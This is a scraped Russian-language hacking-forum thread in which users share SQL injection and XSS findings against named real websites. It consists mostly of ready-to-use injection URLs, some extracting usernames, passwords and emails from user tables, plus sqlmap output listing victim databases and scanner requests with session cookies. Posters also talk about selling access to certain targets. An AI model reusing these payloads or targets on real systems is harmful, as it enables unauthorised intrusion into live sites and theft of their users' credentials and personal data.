Код:
https://крмт.рф/news.php?id=1%27%20UnIoN+SeLEcT+1,2,user%28%29,4,5+--+-
https://www.sexyjamaicans.com/products.php?ID=dasd%27)+and%20extractvalue(0x0a,concat(0x0a,(select%20user())))+--+_&page=4
Последнее редактирование:
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
Код:
http://www.gainwelltravel.com/cms.php?id=asdasda%27+UnIoN%20SeLEcT%20+1,user(),3,4,5,6,7+--+-
http://italianheritagetravel.com/pacchetto.php?id=11231313+UnIoN+SeLEct+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,71#
Код:
https://versatilesmshub.com/blogone.php?id=2+And+false+/*!12345UnIoN*/+SeLEct+1,/*!12345Concat*/(1122211,0x20,password,0x20,middleName,0x20,email,0x20,lastName),3,4,5,6+/*!12345From*/user_master+LiMit+8,1+--+-
https://eprawisdom.com/journals?id=1%27+And+false+UnIoN+SeLEct+1,2,3,group_concat(id,username,password),5,6,7,8,9,0,11,12,13,14 from tbluser+--+-
http://www.nbp-bd.com/product.php?id=3+and+fAlSe+/*!50000UnIoN*/+SeLecT+1,/*!user*/(),3,4,5+--+-
Последнее редактирование:
http://lakshmiimitationjewellery.com/order.php?id=123131%27+/*!12345UnIoN*/+SeLEct+1,2,3,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),5,6,7,8,9,0,1,2+--+-
CPA-сеть Канады
the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2016
Parameter: attachmentid (GET)
Type: inline query
Title: Generic inline queries
Payload: attachmentid=(SELECT CONCAT(CONCAT('qqzvq0m',(CASE WHEN (74210m=74210m) THEN '10m' ELSE '0' END)),'qqbpq'))
available databases [8]:
[*] APTIFY
[*] DBAhealth
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2016
Parameter: attachmentid (GET)
Type: inline query
Title: Generic inline queries
Payload: attachmentid=(SELECT CONCAT(CONCAT('qqzvq0m',(CASE WHEN (74210m=74210m) THEN '10m' ELSE '0' END)),'qqbpq'))
available databases [8]:
[*] APTIFY
[*] DBAhealth
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Последнее редактирование:
Может полные уязвимые линки кинешь?
Чем наковырял?
акушей. Завтра фул дам тогда
URI was set to "onmouseover='4sHm(9607)'bad="
The input is reflected inside a tag parameter between double quotes.
GET /About-Us/"onmouseover='4sHm(9607)'bad="/ HTTP/1.1
Referer: https://www.traxia.co/
Cookie: PHPSESSID=5ol2cq1db92t63gaid543c0akt
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/10.0 (Acunetix Web Vulnerability Scanner - Free Edition)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
Host: www.traxia.co
_________________________________________
The input is reflected inside a tag parameter between double quotes.
GET /About-Us/"onmouseover='4sHm(9607)'bad="/ HTTP/1.1
Referer: https://www.traxia.co/
Cookie: PHPSESSID=5ol2cq1db92t63gaid543c0akt
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/10.0 (Acunetix Web Vulnerability Scanner - Free Edition)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
Host: www.traxia.co
_________________________________________
POST /TokenSale/checkduplicates/ HTTP/1.1
Content-Length: 583
Content-Type: multipart/form-data; boundary=-----Boundary_JUFAEWUOXP
Referer: https://www.truegoldcoin.com
Cookie: ASP.NET_SessionId=aenlhojc11jhg3bxemwyzraa; username=; password=; __cfduid=d0114abeb3408b4a403ff65b65bf708151586530119
Host: www.truegoldcoin.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/10.0 (Acunetix Web Vulnerability Scanner - Free Edition)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="fieldControlType"
1*
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="fieldName"
email
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="pageType"
register
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="rndVal"
0.031173893017694354
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="tableName"
dbo_User
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="value"
sample@email.tst
-------Boundary_JUFAEWUOXP--
Content-Length: 583
Content-Type: multipart/form-data; boundary=-----Boundary_JUFAEWUOXP
Referer: https://www.truegoldcoin.com
Cookie: ASP.NET_SessionId=aenlhojc11jhg3bxemwyzraa; username=; password=; __cfduid=d0114abeb3408b4a403ff65b65bf708151586530119
Host: www.truegoldcoin.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/10.0 (Acunetix Web Vulnerability Scanner - Free Edition)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="fieldControlType"
1*
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="fieldName"
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="pageType"
register
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="rndVal"
0.031173893017694354
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="tableName"
dbo_User
-------Boundary_JUFAEWUOXP
Content-Disposition: form-data; name="value"
sample@email.tst
-------Boundary_JUFAEWUOXP--
Beautiful
- Автор темы
- Добавить закладку
- #73
GET /job-recruiters/job-posting.php HTTP/1.1
Referer: 1*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: site_open_country=RU;recentSearch=deleted
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.placementindia.com
Connection: Keep-alive
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 1' AND (SELECT 5001 FROM (SELECT(SLEEP(5)))emta)-- aZWn
available databases [2]:
[*] information_schema
[*] pinew
76 таблиц, скуля очень медленная
Брутом переберает?
Если да то оно и не странно, так как слепая
- Автор темы
- Добавить закладку
- #75
конечно
Я и не говорю что странно
Ну для тебя конечно не странно)
А к примеру зайдёт тот кто не в курсах, и не знает что такое слип метод.
- Автор темы
- Добавить закладку
- #77
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.v-frontier.com:80/b/s/smf_det.php?bukken_no=69 AND 1745=1745
available databases [5]:
[*] `v-frontier_dreamac`
[*] `v-frontier_dreamb`
[*] `v-frontier_dreamc`
[*] `v-frontier_wordpress`
[*] information_schema
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.v-frontier.com:80/b/s/smf_det.php?bukken_no=69 AND 1745=1745
available databases [5]:
[*] `v-frontier_dreamac`
[*] `v-frontier_dreamb`
[*] `v-frontier_dreamc`
[*] `v-frontier_wordpress`
[*] information_schema
Китай гемблинг нужен парни, а не японская недвижка
- Автор темы
- Добавить закладку
- #79
Ломай сиди. Это не тема с запросами на целевой отлом
Я такого мусора 1к линков могу выложить...за Китай хотя бы платят